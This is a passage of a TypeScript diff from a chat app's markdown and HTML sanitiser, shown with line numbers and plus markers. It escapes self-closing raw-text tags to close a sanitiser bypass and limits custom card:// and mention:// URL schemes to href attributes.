// tokenizes `<textarea/>` as a start tag and enters RAWTEXT identically.
|
|
3548
|
+
// Excluding it here left the entire defense — prose openers, HTML-block
|
|
3549
|
+
// shelters, all of it — bypassable by one extra slash. `RAWTEXT_TAGS` has
|
|
3550
|
+
// no void members, so nothing legitimate self-closes.
|
|
3551
|
+
//
|
|
3552
|
+
// COSMETIC COST (accepted, fail-closed): self-closing IS honored in
|
|
3553
|
+
// foreign content, so an EMPTY `<title/>` inside `<svg>` now escapes
|
|
3554
|
+
// rather than rendering. It carries no accessible name either way, and
|
|
3555
|
+
// the real a11y form `<title>Chart</title>` is unaffected. SECOND COST
|
|
3556
|
+
// added by the same round: a protected span the balance guard deems
|
|
3557
|
+
// not-really-code is routed through this function whole, so bare `<tag`
|
|
3558
|
+
// starts in its GAPS are escaped too — the mask check in
|
|
3559
|
+
// `escapeLeftoverTagStarts` keeps that off genuine code regions.
|
|
3560
|
+
const afterTag = segmentOffset + m.index + match.length
|
|
3561
|
+
out.push(hasLaterCloser(lowerSource, lower, afterTag) ? match : escaped)
|
|
3562
|
+
} else {
|
|
3563
|
+
out.push(match)
|
|
3564
|
+
}
|
|
3565
|
+
cursor = m.index + match.length
|
|
3566
|
+
}
|
|
3567
|
+
if (cursor < segment.length)
|
|
3568
|
+
out.push(escapeLeftoverTagStarts(segment.slice(cursor), lowerSource, segmentOffset + cursor))
|
|
3569
|
+
return out.join('')
|
|
3570
|
+
}
|
|
3571
|
+
|
|
3572
|
+
// ---------------------------------------------------------------------------
|
|
3573
|
+
// URL transform
|
|
3574
|
+
// ---------------------------------------------------------------------------
|
|
3575
|
+
/**
|
|
3576
|
+
* Extends react-markdown's default safe-protocol allowlist with the two
|
|
3577
|
+
* internal schemes the chat remark plugins emit (`card://`, `mention://`),
|
|
3578
|
+
* for `href` ONLY. All other URLs go through `defaultUrlTransform`.
|
|
3579
|
+
*/
|
|
3580
|
+
export function cardAwareUrlTransform(url: string, key: string): string {
|
|
3581
|
+
if (key === 'href' && typeof url === 'string' && (url.startsWith('card://') || url.startsWith('mention://')))
|
|
3582
|
+
return url
|
|
3583
|
+
return defaultUrlTransform(url)
|
|
3584
|
+
}
|